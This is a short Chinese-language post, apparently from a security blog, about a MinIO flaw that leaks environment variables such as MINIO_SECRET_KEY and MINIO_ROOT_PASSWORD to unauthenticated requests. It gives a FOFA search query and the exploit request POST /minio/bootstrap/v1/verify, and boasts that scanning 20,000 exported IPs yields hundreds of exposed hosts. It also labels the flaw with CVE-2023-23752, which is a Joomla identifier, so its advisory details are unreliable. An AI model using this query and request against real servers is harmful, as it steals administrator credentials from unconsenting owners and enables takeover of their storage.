介绍
CVE-2023-23752
影响版本:MinIO RELEASE.2019-12-17T23-16-33Z
MinIO是美国MinIO公司的一款开源的对象存储服务器。该产品支持构建用于机器学习、分析和应用程序数据工作负载的基础架构。
MinIO存在信息泄露漏洞在集群部署的MinIO中,未经身份认证的远程攻击者通过发送特殊HTTP请求即可获取所有环境变量,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,造成敏感信息泄露,最终可能导致攻击者以管理员身份登录MinIO。
实战
语法:
app="minio"
2023-03-25T18:44:57.pngpoc:
POST /minio/bootstrap/v1/verify fofa导出2万条ip脚本跑下来也能有几百个未授权吧
2023-03-25T18:53:01.png2023-03-25T19:03:57.png